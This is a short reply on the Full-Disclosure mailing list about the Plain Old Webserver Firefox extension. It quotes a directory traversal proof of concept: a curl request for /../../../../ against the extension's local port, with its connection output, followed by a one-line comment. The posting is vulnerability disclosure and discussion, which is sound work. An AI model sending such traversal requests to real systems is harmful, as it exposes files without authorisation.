[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <45DF3EC0.6040005@gatech.edu>
Date: Fri, 23 Feb 2007 14:21:36 -0500
From: Matthew Flaschen <matthew.flaschen@...ech.edu>
To: full-disclosure <full-disclosure@...ts.grok.org.uk>
Subject: Re: [WEB SECURITY] Plain Old Webserver -
The coolest firefox extension
Stefano Di Paola wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
>> GET /../../../../ HTTP/1.1
Yep, I think it's just a rite of passage for all web servers.
Matthew Flaschen
Download attachment "signature.asc" of type "application/pgp-signature" (255 bytes)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists